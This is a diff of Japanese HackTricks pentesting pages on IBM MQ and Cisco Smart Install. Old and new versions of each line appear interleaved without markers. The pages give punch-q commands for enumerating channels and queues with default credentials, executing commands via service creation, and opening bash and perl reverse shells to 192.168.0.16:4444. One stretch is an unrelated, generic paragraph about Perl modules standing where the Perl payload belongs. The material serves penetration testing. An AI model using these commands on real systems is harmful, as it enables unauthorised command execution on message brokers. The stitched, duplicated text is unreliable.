* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で企業を宣伝**してみたいですか?または、**PEASS の最新バージョンを入手したり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
* [**公式の PEASS & HackTricks スウォッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass) に**参加**するか、**Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** を**フォロー**してください。
* **ハッキングトリックを共有する**には、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud) PR を提出してください。
</details>

172
network-services-pentesting/1414-pentesting-ibmmq.md
View file

@ -2,51 +2,53 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのスワッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
</details>
## 基本情報
IBM MQは、メッセージキューを管理するためのIBMの技術です。他の**メッセージブローカー**技術と同様に、プロデューサーとコンシューマーの間で情報を受信、保存、処理、分類するために使用されます。
IBM MQは、メッセージキューを管理するためのIBMテクノロジーです。他の**メッセージブローカー**技術と同様に、プロデューサーとコンシューマー間の情報を受信、保存、処理、分類することに特化しています。
デフォルトでは、**IBM MQはTCPポート1414を公開**しています。
には、HTTP REST APIがポート**9443**で公開されていることもあります。
**デフォルトでは、IBM MQはTCPポート1414を公開**しています。
々、HTTP REST APIがポート**9443**で公開されていることがあります。
メトリクスPrometheusはTCPポート**9157**からアクセスできる場合もあります。
IBMは、[https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq)で利用可能な大量の技術ドキュメントを提供しています。
IBM MQ TCPポート1414は、メッセージ、キュー、チャネルなどを操作するだけでなく、**インスタンスを制御するためにも使用**できます。
IBMは、[https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq)で利用可能な大規模な技術ドキュメントを提供しています。
## ツール
簡単な攻撃には**[punch-q](https://github.com/sensepost/punch-q)**というツールが推奨されています。Dockerを使用しています。このツールは、Pythonライブラリ`pymqi`を積極的に使用しています。
簡単な攻撃には**[punch-q](https://github.com/sensepost/punch-q)**が推奨されており、Dockerを使用しています。このツールはPythonライブラリ`pymqi`をアクティブに使用しています。
より手動的なアプローチをする場合は、Pythonライブラリ**[pymqi](https://github.com/dsuch/pymqi)**を使用してください。[IBM MQの依存関係](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)が必要です。
より手動的なアプローチには、Pythonライブラリ**[pymqi](https://github.com/dsuch/pymqi)**を使用します。[IBM MQの依存関係](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)が必要です。
### pymqiのインストール
**IBM MQの依存関係**をインストールしてロードする必要があります
**IBM MQの依存関係**をインストールしてロードする必要があります
1. [https://login.ibm.com/](https://login.ibm.com/)でアカウントIBMidを作成します。
2. [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)からIBM MQライブラリをダウンロードします。Linux x86_64の場合は**9.0.0.4-IBM-MQC-LinuxX64.tar.gz**です。
2. [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)からIBM MQライブラリをダウンロードします。Linux x86_64用には**9.0.0.4-IBM-MQC-LinuxX64.tar.gz**があります。
3. 解凍します(`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`)。
4. `sudo ./mqlicense.sh`を実行してライセンス条件に同意します。
4. ライセンス条件に同意するために`sudo ./mqlicense.sh`を実行します。
> Kali Linuxを使用している場合は、ファイル`mqlicense.sh`を変更します。次の行105-110行目を削除/コメントアウトします。
>Kali Linuxを使用している場合は、ファイル`mqlicense.sh`を変更してください次の行105-110行目を削除/コメントアウトします:
>
> ```bash
> if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
> then
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
> fi
> ```
>```bash
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
> then
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
>fi
>```
5. これらのパッケージをインストールします:
```bash
@ -54,47 +56,47 @@ sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
6. 次に、一時的に`.so`ファイルをLDに追加します`export LD_LIBRARY_PATH=/opt/mqm/lib64`。他の依存関係を使用するツールを実行する**前に**これを行ってください
6. その後、`.so` ファイルを一時的にLDに追加します`export LD_LIBRARY_PATH=/opt/mqm/lib64`、**他のツールを実行する前に**これらの依存関係を使用しています
次に、プロジェクト[**pymqi**](https://github.com/dsuch/pymqi)をクローンします。これには興味深いコードスニペットや定数などが含まれています。または、次のコマンドで直接ライブラリをインストールすることもできます:`pip install pymqi`。
次に、プロジェクト [**pymqi**](https://github.com/dsuch/pymqi) をクローンします:興味深いコードスニペット、定数などが含まれています。または、次のコマンドでライブラリを直接インストールできます:`pip install pymqi`。
### punch-qの使用
### punch-q の使用
#### Dockerを使用する場合
#### Docker を使用する場合
単純に次のコマンドを使用します:`sudo docker run --rm -ti leonjza/punch-q`。
単純に次を使用します:`sudo docker run --rm -ti leonjza/punch-q`。
#### Dockerを使用しない場合
#### Docker を使用しない場合
プロジェクト[**punch-q**](https://github.com/sensepost/punch-q)をクローンし、インストールのためにreadmeに従ってください`pip install -r requirements.txt && python3 setup.py install`)。
プロジェクト [**punch-q**](https://github.com/sensepost/punch-q) をクローンし、インストールのために readme に従ってください(`pip install -r requirements.txt && python3 setup.py install`)。
その後、`punch-q`コマンドで使用できます。
その後、`punch-q` コマンドで使用できます。
## 列挙
**punch-q**または**pymqi**を使用して、**キューマネージャー名、ユーザー、チャネル、キュー**を列挙することができます。
**punch-q** または **pymqi** を使用して、**キューマネージャー名、ユーザー、チャネル、およびキュー** を列挙することができます。
### キューマネージャー
キューマネージャー名を取得するための保護がない場合があります:
時々、キューマネージャー名を取得するための保護がない場合があります:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
### チャネル
### チャネル
**punch-q**は既存のチャネルを見つけるために内部(変更可能)ワードリストを使用しています。使用例:
**punch-q**は既存のチャネルを見つけるために内部(変更可能)ワードリストを使用しています。使用例:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
いくつかのIBM MQインスタンスは、**認証されていない**MQリクエストを受け付けることがありますので、`--username / --password`は必要ありません。もちろん、アクセス権も異なる場合があります。
いくつかのIBM MQインスタンスは、**認証されていない**MQリクエストを受け入れることがありますので、`--username / --password`は必要ありません。もちろん、アクセス権も異なる場合があります。
一度チャネル名(ここでは`DEV.ADMIN.SVRCONN`)を取得すると、他のすべてのチャネルを列挙することができます。
一度チャネル名(ここでは`DEV.ADMIN.SVRCONN`)を取得すると、他のすべてのチャネルを列挙することができます。
列挙は、基本的には**pymqi**の`code/examples/dis_channels.py`というコードスニペットを使用して行うことができます。
列挙は基本的に、**pymqi**の`code/examples/dis_channels.py`からのこのコードスニペットを使用して行うことができます。
```python
import logging
import pymqi
@ -131,8 +133,8 @@ logging.info('Found channel `%s`' % channel_name)
qmgr.disconnect()
```
...しかし、**punch-q**もその部分を埋め込んでいます(さらに詳細な情報も含まれています!)。
次のコマンドで実行できます:
... しかし、**punch-q**もその部分を埋め込みます(詳細情報付き!)。
次のようにして起動できます:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
@ -155,7 +157,7 @@ Showing channels with prefix: "*"...
```
### キュー
**pymqi** (`dis_queues.py`) にはコードスニペットがありますが、**punch-q** を使用するとキューに関するさらなる情報を取得できます。
**pymqi** (`dis_queues.py`) でコードスニペットがありますが、**punch-q** はキューに関するさらに多くの情報を取得できます。
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
@ -189,36 +191,36 @@ Showing queues with prefix: "*"...
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
**すべての特定のキューに対して繰り返し処理を躊躇しないでください。**
**特定されたすべてのキューに反復処理を躊躇しないでください。**
### コードの実行
### コード実行
> 続行する前にいくつかの詳細: IBM MQは複数の方法で制御できます: MQSC、PCF、Control Command。一般的なリストは[IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison)にあります。
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***)は、インスタンスとリモートでやり取りするために焦点を当てています。**punch-q** そしてさらに **pymqi** は PCF インタラクションに基づいています。
> 続ける前にいくつかの詳細を説明します: IBM MQは複数の方法で制御できます: MQSC、PCF、Control Command。一般的なリストは[IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison)で見つけることができます。
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***)は、リモートでインスタンスと対話するために焦点を当てているものです。**punch-q**とさらに**pymqi**は、PCFの相互作用に基づいています。
>
> PCFコマンドのリストを見つけることができます:
> * [PCFドキュメントから](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats)、および
> * [定数から](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes)。
>
> 1つの興味深いコマンドは`MQCMD_CREATE_SERVICE`で、そのドキュメントは[こちら](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms)で利用できます。このコマンドは、インスタンス上のローカルプログラムを指す`StartCommand`を引数として取ります(例:`/bin/sh`)。
>
> ドキュメントには、このコマンドの警告もあります: *"注意: このコマンドを使用する権限が与えられると、ユーザーはmqm権限で任意のコマンドを実行できます。このコマンドを使用する権限が与えられた場合、悪意のあるユーザーや注意を欠いたユーザーは、システムやデータを破損するサービスを定義することができます。たとえば、重要なファイルを削除することができます。"*
>
> *注: IBM MQドキュメント管理リファレンスによれば、サービスの作成`DEFINE SERVICE`のための同等のMQSCコマンドを実行するためのHTTPエンドポイント`/admin/action/qmgr/{qmgrName}/mqsc`も存在します。この側面はまだここではカバーされていません。*
リモートプログラムの実行のためのPCFによるサービスの作成/削除は、**punch-q**によって行うことができます:
> 興味深いコマンドの1つは `MQCMD_CREATE_SERVICE` で、そのドキュメントは[こちら](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms)で利用できます。これは、インスタンス上のローカルプログラムを指す `StartCommand` を引数として取ります(例: `/bin/sh`)。
> ドキュメントにはコマンドの警告もあります: *"注意: このコマンドを使用すると、ユーザーが mqm 権限で任意のコマンドを実行できます。このコマンドの使用権限が付与された場合、悪意のあるユーザーや不注意なユーザーが、例えば重要なファイルを削除することでシステムやデータを損傷させるサービスを定義できます。"*
> *注: IBM MQドキュメント管理リファレンスによれば、サービス作成`DEFINE SERVICE`のための等価なMQSCコマンドを実行するためのHTTPエンドポイント `/admin/action/qmgr/{qmgrName}/mqsc` も存在します。この側面はここではまだカバーされていません。*
PCFを使用してリモートプログラムの実行のためのサービス作成/削除は **punch-q** によって行うことができます:
**例1**
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
> IBM MQのログには、コマンドが正常に実行されたことが記録されています
> IBM MQのログには、次のようにコマンドが正常に実行されたことが記録されています:
>
> ```bash
> 2023-10-10T19:13:01.713Z AMQ5030I: コマンド '808544aa7fc94c48' が開始されました。プロセスID(618)。[ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> 2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> ```
また、マシン上の既存のプログラムを列挙することもできます(ここでは `/bin/doesnotexist` ... 存在しません):
マシン上の既存のプログラムを列挙することもできます(ここでは`/bin/doesnotexist`...は存在しません):
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
@ -233,42 +235,28 @@ Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
**プログラムの起動が非同期であることに注意してください。したがって、エクスプロイトを活用するためには、2番目のアイテムが必要です** ***(リバースシェルのリスナー、異なるサービスでのファイル作成、ネットワークを介したデータの外部流出など)***
**プログラムの起動は非同期であることに注意してください。そのため、エクスプロイトを活用するためには、別のアイテムが必要です** ***(逆シェル用のリスナー、異なるサービス上でのファイル作成、ネットワークを介したデータの外部流出など)***
**例2**
簡単なリバースシェルのために、**punch-q**は2つのリバースシェルペイロードも提供しています:
簡単な逆シェルのために、**punch-q** はまた2つの逆シェルペイロードを提案しています:
* bashを使用したもの
* perlを使用したもの
- bashを使用したもの
- perlを使用したもの
*もちろん、`execute`コマンドを使用してカスタムのリバースシェルを作成することもできます。*
*もちろん、`execute`コマンドを使用してカスタムの逆シェルを構築することもできます。*
bashの場合:
bash用:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
Perlパールについて
Perlは、高水準の動的プログラミング言語であり、多くのネットワークサービスのペネトレーションテストに使用されます。Perlは、その柔軟性と強力なテキスト処理機能で知られています。以下は、Perlを使用したネットワークサービスのペネトレーションテストに関するいくつかの重要なポイントです。
1. ポートスキャンPerlのNet::Pingモジュールを使用して、ネットワーク上の特定のポートの状態を確認できます。これにより、開いているポートや閉じているポートを特定することができます。
2. パケットキャプチャPerlのNet::Pcapモジュールを使用して、ネットワーク上のパケットをキャプチャし、解析することができます。これにより、ネットワークトラフィックの分析や潜在的な脆弱性の特定が可能になります。
3. プロトコル解析PerlのNet::Packetモジュールを使用して、ネットワーク上のさまざまなプロトコルを解析できます。これにより、ネットワーク上の通信の内容や構造を理解し、セキュリティ上の問題を特定することができます。
4. データベースアクセスPerlのDBIモジュールを使用して、データベースに対してクエリを実行したり、データを操作したりすることができます。これにより、データベースに関連するセキュリティ上の問題を特定することができます。
5. ウェブアプリケーションテストPerlのLWPモジュールを使用して、ウェブアプリケーションのテストを自動化することができます。これにより、ウェブアプリケーションのセキュリティ上の脆弱性を特定し、悪用を防ぐことができます。
Perlは、その豊富なモジュールと柔軟性により、ネットワークサービスのペネトレーションテストにおいて非常に有用なツールとなっています。
Perlの場合
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
### カスタムPCF
### カスタム PCF
IBM MQのドキュメントを調べ、**punch-q**で実装されていない特定のPCFコマンドをテストするために、**pymqi**のPythonライブラリを直接使用することができます。
IBM MQ のドキュメントを調査し、**punch-q** で実装されていない特定の PCF コマンドをテストするために **pymqi** Python ライブラリを直接使用できます。
**例:**
```python
@ -298,9 +286,9 @@ else:
qmgr.disconnect()
```
もし定数が見つからない場合は、[IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors)を参照することができます。
定数名が見つからない場合は、[IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors)を参照できます。
> *例として、[`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (10進数 = 73)を使用します。パラメータ`MQCA_CLUSTER_NAME` (10進数 = 2029)が必要で、`*`にすることができます(ドキュメント: )。*
> *[`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster)の例10進数 = 73。`MQCA_CLUSTER_NAME`10進数 = 2029が必要で、`*`にすることができますDoc: :*
>
> ```python
> import pymqi
@ -320,7 +308,7 @@ qmgr.disconnect()
> args = {2029: "*"}
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
> print("エラー")
> print("Error")
> else:
> print(response)
>
@ -329,27 +317,27 @@ qmgr.disconnect()
## テスト環境
IBM MQの動作や脆弱性をテストするために、Dockerを使用したローカル環境をセットアップすることができます。
IBM MQの動作と脆弱性をテストしたい場合は、Dockerをベースにしたローカル環境をセットアップできます
1. ibm.comcloud.ibm.comにアカウントを持っていること。
2. 以下の手順でコンテナ化されたIBM MQを作成します
1. ibm.comおよびcloud.ibm.comにアカウントを持っていること。
2. の手順でコンテナ化されたIBM MQを作成します
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
デフォルトでは、認証有効になっており、ユーザー名は `admin` でパスワードは `passw0rd` です(環境変数 `MQ_ADMIN_PASSWORD`)。
ここでは、キューマネージャの名前`MYQUEUEMGR` に設定されています(変数 `MQ_QMGR_NAME`)。
デフォルトでは、認証有効になっており、ユーザー名は `admin` でパスワードは `passw0rd` です(環境変数 `MQ_ADMIN_PASSWORD`)。
ここでは、キューマネージャー名`MYQUEUEMGR` に設定されています(変数 `MQ_QMGR_NAME`)。
IBM MQを起動し、ポートを公開している必要があります:
IBM MQ が稼働しており、ポートが公開されている必要があります:
```bash
sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
```
> IBM MQの古いバージョンのDockerイメージは次の場所にありますhttps://hub.docker.com/r/ibmcom/mq/。
> IBM MQの古いバージョンのDockerイメージは次の場所にあります: https://hub.docker.com/r/ibmcom/mq/.
## 参考文献
* [mgeekyのgist - "実践的なIBM MQペネトレーションテストのート"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [mgeekyのgist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
* [IBM MQドキュメント](https://www.ibm.com/docs/en/ibm-mq)
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)

36
network-services-pentesting/4786-cisco-smart-install.md
View file

@ -4,44 +4,44 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に**参加**するか、[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## 基本情報
**Cisco Smart Install**は、新しいCiscoハードウェアの初期設定とオペレーティングシステムイメージのロードを自動化するためにCiscoが設計したものです。**デフォルトでは、Cisco Smart InstallはCiscoハードウェアでアクティブであり、トランスポート層プロトコルであるTCPを使用し、ポート番号4786を使用します。**
**Cisco Smart Install**は、新しいCiscoハードウェアの初期設定とオペレーティングシステムイメージの読み込みを自動化するために設計されたCiscoです。 **デフォルトでは、Cisco Smart InstallはCiscoハードウェアでアクティブであり、トランスポート層プロトコルであるTCPを使用し、ポート番号4786を使用します。**
**デフォルトポート** 4786
**デフォルトポート:** 4786
```
PORT STATE SERVICE
4786/tcp open smart-install
```
## **Smart Install Exploitation Tool**
**2018年、このプロトコルには重大な脆弱性であるCVE-20180171が見つかりました。脅威レベルはCVSSスケールで9.8です。**
**2018年、このプロトコルで重大な脆弱性であるCVE-20180171が発見されました。脅威レベルはCVSSスケールで9.8です。**
**Cisco Smart InstallがアクティブなTCP/4786ポートに送信される特別に作成されたパケットは、バッファオーバーフローを引き起こし、攻撃者が以下のことを行うことを可能にします:**
**Cisco Smart InstallがアクティブなTCP/4786ポートに送信される特別に作成されたパケットは、バッファオーバーフローを引き起こし、攻撃者がのことを行うことを可能にします:**
* デバイスを強制的に再起動する
* RCEを呼び出す
* ネットワーク機器の設定を盗む
**この脆弱性を悪用するために開発された** [**SIET**](https://github.com/frostbits-security/SIET) **Smart Install Exploitation Tool**を使用すると、Cisco Smart Installを悪用することができます。この記事では、正当なネットワークハードウェアの設定ファイルを読み取る方法を紹介します。ペンテスターにとって、構成の外部流出は貴重な情報となり、ネットワークの固有の機能について学ぶことができます。これにより、攻撃の新たなベクトルを見つけることが容易になります。
